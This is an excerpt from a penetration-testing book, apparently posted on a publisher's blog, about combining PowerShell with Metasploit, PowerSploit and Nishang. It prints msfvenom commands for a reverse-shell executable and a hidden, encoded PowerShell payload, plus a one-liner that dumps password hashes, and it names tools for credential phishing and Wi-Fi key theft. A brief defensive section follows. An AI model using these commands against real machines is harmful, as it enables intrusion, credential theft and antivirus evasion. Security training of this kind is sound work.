PowerShell is a perfect tool for performing sophisticated attacks, and also, can be used side-by-side with the
Metasploit Framework.
This article is an excerpt taken from the book
Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN.
In today's post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests.
Interactive PowerShell
PowerShell attacks are already integrated into Metasploit. You can check by using the search command:
msf> search powershell
Now it is time to learn how to use Metasploit with PowerShell. For a demonstration of one of the many uses, you can convert a PowerShell script into an executable file using the msfvenom utility:
>msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe
>msfvenom -p windows/exec CMD=“powershell -ep bypass -W Hidden -enc [Powershell script Here]” -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe
PowerSploit
PowerSploit is an amazing set of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, you need to grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:
# git clone https://github.com/PowerShellMafia/PowerSploit
After cloning the project, use the ls command to list the files:
From the following screenshot, you can note that PowerSploit contains a lot of amazing scripts for performing a number of tasks, such as:
- AntivirusBypass
- Exfiltration
- Persistence
- PowerSploit
- PowerUp
- PowerView
Nishang – PowerShell for penetration testing
Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang:
# git clone https://github.com/samratashok/nishang
As you can see from listing the downloaded project, Nishang is loaded with many various scripts and utilities for performing a lot of required tasks during penetration testing missions, such as:
- Privilege escalation
- Scanning
- Pivoting
You can explore all the available scripts by listing the content of Nishang project using the ls command:
Let's explore some of Nishang's script power on a Windows machine:
You can import all the modules using the Import-Module PowerShell cmdlet:
Oops, something went wrong! Don't worry, in order to use the Import-Module, you need to open PowerShell as an administrator, and type Set-ExecutionPolicy -ExecutionPolicy RemoteSigned:
Then you can import the modules:
Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information:
If you want to unveil WLAN keys, type Get-WLAN-Keys:
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
You can go further and dump password hashes from a target machine in a post-exploitation mission. Thanks to the Get-PassHashes module, you are able to dump password hashes. This is the output of it from my local machine:
However, if you want to pop the command after getting a shell, use:
Powershell.exe –exec bypass –Command “& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1' , Get-PassHashes}”
You can even perform a phishing attack using Invoke-CredentialPhish, like in the previous demonstration. You can run this attack on the victim's machine:
Defending against PowerShell attacks
In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to:
- Implement the latest PowerShell version (version 5, when this book was written). To check, type Get-Host:
- Monitor PowerShell logs.
- Ensure a least-privilege policy and group policies settings. You can edit them with the Local Group Policy Editor. If you are using the Windows 10 Enterprise edition, you can also use AppLocker:
- Use the Constrained Language mode:
PS C:Windowssystem32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
- To check the Constrained Language mode, type:
$ExecutionContext.SessionState.LanguageMode
- That way, malicious scripts won't work:
Thus, in this article, we saw the combination of Metasploit and PowerShell to perform more customized attacks and security tests. If you've enjoyed reading this post, and want to learn how to exploit enterprise VLANS, and go from theory to real-world experience, do check out Advanced Infrastructure Penetration Testing.
Pentest tool in focus: Metasploit
Approaching a Penetration Test Using Metasploit
Getting Started with Metasploitable2 and Kali Linux
United States
United Kingdom
India
Germany
France
Canada
Russia
Spain
Brazil
Australia
Argentina
Austria
Belgium
Bulgaria
Chile
Colombia
Cyprus
Czechia
Denmark
Ecuador
Egypt
Estonia
Finland
Greece
Hungary
Indonesia
Ireland
Italy
Japan
Latvia
Lithuania
Luxembourg
Malaysia
Malta
Mexico
Netherlands
New Zealand
Norway
Philippines
Poland
Portugal
Romania
Singapore
Slovakia
Slovenia
South Africa
South Korea
Sweden
Switzerland
Taiwan
Thailand
Turkey
Ukraine
